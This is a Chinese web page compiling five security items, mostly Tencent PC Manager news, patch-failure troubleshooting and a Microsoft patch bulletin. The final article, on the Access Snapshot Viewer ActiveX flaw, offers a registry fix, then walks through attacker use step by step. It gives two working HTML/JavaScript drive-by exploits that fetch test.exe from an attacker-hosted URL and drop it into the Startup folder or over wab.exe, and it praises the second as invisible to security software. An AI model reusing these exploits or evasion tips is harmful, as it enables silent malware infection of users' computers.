一 : Hacking Team漏洞再爆危机腾讯电脑管家护航
【61阅读IT新闻频道】国外知名软件开发商Hacking Team被黑客攻击,大型数据泄漏的恶劣影响还在持续。近日,腾讯反病毒实验室拦截到一个利用Hacking Team事件爆出的flash漏洞进行大规模挂马传播的木马,主要功能是静默安装多款流氓软件,总传播量上百万,对整个互联网安全构成了严重的威胁。
据了解,腾讯反病毒实验室分析和追踪发现,携带该木马的主体是一个广告flash。用户一旦访问挂马网站,该flash文件会自动下载并播放,从而触发漏洞导致用户电脑感染上木马,主要影响Windows、MacOSX和Linux平台上的IE、Chrome等主流浏览器。值得注意的是,如果用户电脑已经有flash补丁,挂马网页则显示为正常的广告,如果没有flash相应补丁,则会触发漏洞。
图1:挂马的flash文件
腾讯反病毒实验室相关负责人表示,目前该木马传播量巨大,为了逃避杀毒软件的查杀,木马平均2-3小时更新变种一次,在10月中旬开始传播后,目前已出现数百个变种,总传播量上百万。用户电脑一旦感染该木马,会被静默安装多流氓软件,而该木马涵盖大量流氓软件,堪称是流氓软件大全,部分被安装的流氓软件还具有向安卓手机静默安装应用的功能,危害用户手机安全。同时,该木马有“黑吃黑”的特性,能够清除电脑上已安装的其他流氓软件,达到独占用户电脑的目的。
图2:腾讯电脑管家准确检测查杀挂马行为
腾讯反病毒实验室相关负责人指出,号称“黑客核武库”的Hacking Team被黑客攻击,导致大量数据泄露是这次安全事件的罪魁祸首。Hacking Team泄露的数据,大幅降低黑客攻击的门槛,让整个黑色产业链的技术水平提高一个档次,攻击者仅需对代码进行少量修改便可生成强大的攻击“武器”,给整个互联网安全带来严重威胁。
目前,腾讯电脑管家已实现第一时间发现并查杀该木马,能够对网络挂马行为有效拦截,需要的用户可以前往官网下载(http://guanjia.qq.com/)。同时,腾讯反病毒实验室提醒用户,及时安装软件厂商提供的安全补丁有效降低电脑被攻击的风险,保障个人电脑安全。
IT新闻微信公众平台
第一时间获取新鲜资讯
使用手机扫描左方二维码
二 : 用QQ电脑管家修补漏洞失败。该怎么处理?
用QQ电脑管家修补漏洞失败。该怎么处理?
用电脑管家修补漏洞失败。该怎么处理?
一般情况下,修补漏洞失败有几种可能,你可以对号入座:
1、部分补丁需要重新启动计算机才会真正生效。解决办法:重新启动计算机。
2、如果是MS-OFFICE漏洞,可能是因为缺少必要的office文件会导致此类漏洞修复失败。这可能是软件本身安装不完整,或某些文件已被删除。
解决办法:重新安装Office软件。
3、开启某些防护类软件可能导致修复失败。解决办法:暂时关闭防护类软件。
4、其它意外的情况导致修复失败。
解决办法:暂时忽略反复修复失败的漏洞,隔一段时间后再次修复。
5、对于非高危的补丁,您可以暂时选择忽略处理。
6、运行修复漏洞时,如果不能修复(安装失败或重启漏洞还存在) ,也可以点这个漏洞右面的详情,从官方网站下载后手动安装。
7、如果仍然提示安装错误,你还可以到安全模式下修复安装。
三 : 腾讯电脑管家怎么设置漏洞修复完成后不弹出提醒?
如何设置腾讯电脑管家漏洞修复完成后不再弹出提醒呢,现在我就来为大家说明一下如何操作。
1、启动腾讯电脑管家,点击选择程序界面右上角的【主菜单】按钮。(如图所示)
2、在【主菜单】下,点击选择【设置中心】选项。(如图所地示)
3、在【设置中心】界面下,点击选择【修复漏洞】-->勾选【漏洞修复完成后不弹出提醒】选项-->【确定】完成设置。(如图所示)
相关推荐:
腾讯电脑管家怎么额外增加1天QQ活跃天数?
腾讯电脑管家Win10升级助手怎么下载?哪里下载?
腾讯电脑管家不能正常预约升级正版win10系统怎么办?
用电脑管家登陆QQ可以会加速等级?腾讯管家自动关联QQ的方法
四 : 微软发布10月份高危漏洞补丁 腾讯电脑管家已及时修复
微软每月例行的安全公告于2014年10月15日,也就是今日发布,腾讯电脑管家第一时间为大家推送了微软10月份安全补丁,请使用电脑管家的用户及时修复高危漏洞以避免病毒木马入侵电脑。
本次微软发布的8个安全公告,重点涉及了IE浏览器、Office软件、.Net等Windows组件中存在的多个安全漏洞。电脑管家在此提醒广大用户,漏洞始终是病毒木马入侵电脑的重要通道,及时安装安全更新,可以大大降低电脑被恶意攻击的可能性。
除此之外,Adobe公司也同时推送了安全更新,修复了Adobe Flash的严重漏洞。众所周知,Adobe公司旗下的软件由于用户量巨大,已经成为黑客攻击的主要目标。
电脑管家团队经过反复测试多次验证,保证了漏洞修复功能的可靠性和稳定性,请广大用户放心修复。
电脑管家提醒:
本次最重要的关键级别安全补丁是MS14-056(KB2987107),该更新共修复了涉及IE的11个严重及3个重要漏洞。浏览器是最易受到攻击的对象,攻击者会通过用户浏览恶意网站来利用这种脆弱性,因此该补丁应最先考虑修复。
另外,MS14-060(KB3000869),则修复了10月14日曝出的已被利用的OLE远程代码执行的0day漏洞。同时,管家10.3以上版本已支持对利用该漏洞攻击样本的完美查杀。
据了解,电脑管家自主引擎已经是第二次通过全球权威评测,在前不久国际著名第三方测评认证机构西海岸实验室6月份杀毒软件测评中,腾讯电脑管家自主引擎同样以满分的成绩获得西海岸Check Mark认证。国际权威的四大评测机构——西海岸、VB100、AVC、AV-Test,腾讯电脑管家自主引擎相继斩获两大机构的认证,并且也是目前为止国内唯一一个通过国际权威评测的中国新一代自主引擎,代表着中国自主杀毒引擎技术首次获得了国际认可。
1、为什么我修复了漏洞,仍然显示橙色预警?
橙色预警是针对整个网络安全状况的,本机漏洞修复完成后,预警状态并不会立即消失。
2、为什么重启后,多了蓝屏修复的开机选项。
少部分用户反馈由于本机环境修复系统漏洞后会出现蓝屏等异常状况,电脑管家开发出的开机修复功能则彻底杜绝了这一现象的发生。
3、为什么我收到的不是4个漏洞?
由于您当前电脑漏洞修补状况以及系统版本和组件的差异,收到的数量可能略有不同。
五 : 堵住电脑中的Access漏洞 拒绝恶意网站
Access漏洞威胁的潜在人群十分巨大。目前已经有不少利用该漏洞的恶意网站了,一旦用户访问这些页面就会被植入木马下载器,这些木马下载器成功进入用户系统并执行后,就会下载其他的恶意程序木马,试图盗取用户的QQ、网游等账号,危险不言而喻。
本次Access漏洞除Office2007版本外,在以前的版本中广泛存在。由于用户在安装Office的时候很多都是选择的默认安装,附带也安装了Access,所以漏洞威胁的用户群数量非常的巨大。
HTTP GET功能导致漏洞出现
本次的Access漏洞的全名称为“Microsoft Office Snapshot Viewer ActiveX Exploit 漏洞”,是一个ActiveX控件漏洞。该漏洞存在于snapview.ocx控件中,出现的原因是因为该控件具有HTTP GET功能,这个功能可以从指定的网址下载指定的文件。
黑客要利用该漏洞,先要特制一个恶意网站引诱用户访问。当用户打开该网页的时候,恶意网址就赋给了HTTP GET功能,该功能被激活后就偷偷从恶意网址下载病毒,这样病毒就可以神不知鬼不觉地进入用户的系统中,威胁用户的各种账号和密码。受这个漏洞影响的Access版本有2003、2002、2000。
Access漏洞解决方案
方案1:现在已经有了该漏洞的补丁了,请大家赶快到http://www.shudoo.com/bzsoft下载。此外,我们还可以在“工具→Internet选项→安全”中,选择“Internet”图标,然后将下面的安全级别中设置为“高”(图3),这样可以有效地阻止网页木马入侵。
图3
方案2 :将以下内容复制在记事本中,另存为1.reg,然后双击导入注册表也可以堵上漏洞。
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{F2175210-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 |
目前黑客利用Access漏洞的主要方式
方式1:写入启动项
先申请一个免费的Web空间,用Mini downloader by SEC配置网页木马,在“URL”处输入网页木马地址,再点击“Creat”,又再弹出窗口中将文件保存为test.exe,这样就网页木马就配置好了。
接着将test.exe上传到先前申请的免费空间里面,病毒地址就是:http://(这里是申请的空间地址)/test.exe 。将以下漏洞的利用代码复制粘贴到新建的记事本里,另存为test.html。
<html> <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id='obj'></object> <script language='javascript'> var buf1 = ‘http://(这里是申请的空间地址)/test.exe'; var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe'; obj.SnapshotPath = buf1; obj.CompressedPath = buf2; </script> </html> |
最后将test.html上传到空间里,得到病毒的访问地址:。做到这步,剩下的工作就是传播网址引诱用户访问了。当用户访问该网页时就会中招,用户的电脑会在启动项里出现test.exe文件。
点评:这种方式有个缺点,就是有些安全软件会提示有程序写入启动项。
方式2:不写入启动项
将以下代码复制到新建的记事本中,另存为test.html上传到空间即可。当用户访问该网页时也会中招,不过启动项里没有test.exe文件,用户无法察觉自己中毒了。
<html> <body> <script type="text/javascript"> function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "C:/Program Files/Outlook Express/wab.exe"; mycars[1] = "d:/Program Files/Outlook Express/wab.exe"; var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1"); if(objlcx="[object]") { setTimeout('window.location = "[url=ldap://"]ldap://"',3000[/url]); for (x in mycars) { obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1") var buf1 = 'http://(这里是申请的空间地址)/test.exe'; var buf2=mycars[x]; obj.Zoom = 0; obj.ShowNavigationButtons = false; obj.AllowContextMenu = false; obj.SnapshotPath = buf1; try { obj.CompressedPath = buf2; obj.PrintSnapshot(); }catch(e){} } } </script> </body> </html> |
点评:这种方式无需写入启动项,这样安全软件就不会有任何提示了,在用户访问恶意页面的时候直接中马,使用户中马的概率更高。
本文标题:电脑管家修补漏洞-Hacking Team漏洞再爆危机腾讯电脑管家护航61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1